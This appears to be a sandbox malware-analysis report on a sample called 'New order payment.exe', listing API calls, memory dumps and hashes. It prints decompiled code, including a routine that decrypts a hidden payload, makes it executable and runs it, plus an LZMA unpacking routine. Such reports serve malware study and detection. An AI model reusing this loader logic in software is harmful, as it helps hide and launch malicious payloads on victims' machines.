                                                                • lstrcatA.KERNEL32(?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405546
                                                                • lstrlenA.KERNEL32(?,?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040554C
                                                                • FindFirstFileA.KERNEL32(00421540,?,?,?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040555D
                                                                • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040560F
                                                                • FindClose.KERNEL32(?), ref: 00405620
                                                                Strings
                                                                • "C:\Users\user\Desktop\New order payment.exe" , xrefs: 004054BD
                                                                • \*.*, xrefs: 0040551F
                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004054C7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                • String ID: "C:\Users\user\Desktop\New order payment.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                • API String ID: 2035342205-3114749834
                                                                • Opcode ID: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                                                                • Instruction ID: 6fea787f5ff7f663b03802bfccf250d7b0f6b6b9ddff8139893414afbc0e0c0d
                                                                • Opcode Fuzzy Hash: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                                                                • Instruction Fuzzy Hash: D851CE30804A447ACB216B218C49BBF3B78DF92728F54857BF809751D2E73D5982DE5E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 732254DA, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 732255B4
                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,73225262,7FC6FA16,73225421), ref: 732255DE
                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,73225262,7FC6FA16), ref: 732255F5
                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,73225262,7FC6FA16,73225421), ref: 73225617
                                                                • FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,73225262,7FC6FA16,73225421,00000000,00000000), ref: 7322568A
                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,73225262,7FC6FA16,73225421), ref: 73225695
                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,73225262,7FC6FA16,73225421,00000000), ref: 732256E0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                • String ID:
                                                                • API String ID: 656311269-0
                                                                • Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                                • Instruction ID: 63c9e5cb8fe04b19d09d95fa370bf8c70e35fed55beae6f883b3825d5713af8a
                                                                • Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                                • Instruction Fuzzy Hash: 4261B5B1F00709ABDB10CFA4CC84BAEFBB5AF48711F258059E906E7390DB749D818B55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 73223070, Relevance: 6.2, APIs: 4, Instructions: 182memoryCOMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E73223070() {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				long _v20;
				void* _t121;

				_v16 = _v16 & 0x00000000;
				_t121 = RtlAllocateHeap(GetProcessHeap(), 1, 0xbebc200); // executed
				_v16 = _t121;
				if(_v16 != 0) {
					memset(_v16, 0xde, 0xbebc200);
					_v12 = _v12 & 0x00000000;
					_v12 = _v12 & 0x00000000;
					while(_v12 < 0x1298) {
						_t14 =  &E732250D8 + _v12; // 0x0
						_v5 =  *_t14;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 = _v5 & 0x000000ff ^ 0x00000014;
						_v5 = (_v5 & 0x000000ff) + 0xe3;
						_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
						_v5 = _v5 & 0x000000ff ^ 0x0000004b;
						_v5 = (_v5 & 0x000000ff) - 0x74;
						_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
						_v5 = (_v5 & 0x000000ff) + 0xf9;
						_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
						_v5 = (_v5 & 0x000000ff) + 0x36;
						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ 0x000000d3;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - 0x9b;
						_v5 = _v5 & 0x000000ff ^ 0x000000ee;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 = _v5 & 0x000000ff ^ 0x000000b6;
						_v5 = (_v5 & 0x000000ff) - 0xc;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - 0xae;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) - 0x20;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) + 0xb9;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) - 0x51;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) - 0xce;
						_v5 = _v5 & 0x000000ff ^ _v12;
						 *((char*)( &E732250D8 + _v12)) = _v5;
						_v12 = _v12 + 1;
					}
					VirtualProtect( &E732250D8, 0x1298, 0x40,  &_v20); // executed
					E732250D8(); // executed
				}
				return 0;
			}








                                                                0x73223076
                                                                0x73223088
                                                                0x7322308e
                                                                0x73223095
                                                                0x732230a8
                                                                0x732230b0
                                                                0x732230b4
                                                                0x732230c1
                                                                0x732230d1
                                                                0x732230d7
                                                                0x732230e1
                                                                0x732230eb
                                                                0x732230f5
                                                                0x73223101
                                                                0x73223114
                                                                0x7322311e
                                                                0x73223128
                                                                0x7322313b
                                                                0x73223147
                                                                0x7322315a
                                                                0x73223164
                                                                0x73223176
                                                                0x7322317f
                                                                0x7322318b
                                                                0x73223195
                                                                0x7322319e
                                                                0x732231aa
                                                                0x732231b6
                                                                0x732231c0
                                                                0x732231d3
                                                                0x732231dd
                                                                0x732231f0
                                                                0x732231fa
                                                                0x7322320d
                                                                0x73223217
                                                                0x73223221
                                                                0x7322322d
                                                                0x73223237
                                                                0x73223240
                                                                0x7322324c
                                                                0x73223256
                                                                0x73223260
                                                                0x73223269
                                                                0x73223273
                                                                0x7322327f
                                                                0x73223289
                                                                0x73223293
                                                                0x7322329d
                                                                0x732232a9
                                                                0x732232b3
                                                                0x732232bc
                                                                0x732230be
                                                                0x732230be
                                                                0x732232d7
                                                                0x732232e2
                                                                0x732232e2
                                                                0x732232e9

                                                                APIs
                                                                • GetProcessHeap.KERNEL32(00000001,0BEBC200), ref: 73223081
                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 73223088
                                                                • memset.MSVCRT ref: 732230A8
                                                                • VirtualProtect.KERNEL32(732250D8,00001298,00000040,?), ref: 732232D7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Heap$AllocateProcessProtectVirtualmemset
                                                                • String ID:
                                                                • API String ID: 173993298-0
                                                                • Opcode ID: 02edceccb622a3980da6726a009f3b19d9c689749a65836f610cd6dd10d81a09
                                                                • Instruction ID: 0747709f7a1f668763e6ad50d8f26d555b9f8e9947eb0bc62debf0a18c042302
                                                                • Opcode Fuzzy Hash: 02edceccb622a3980da6726a009f3b19d9c689749a65836f610cd6dd10d81a09
                                                                • Instruction Fuzzy Hash: F3815861C5D2DCADDB06CBF984547EDBFB05F26102F0945D6E4E1A6283C13A938EDB21
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004061D4, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 98%
                                                                			E004061D4() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
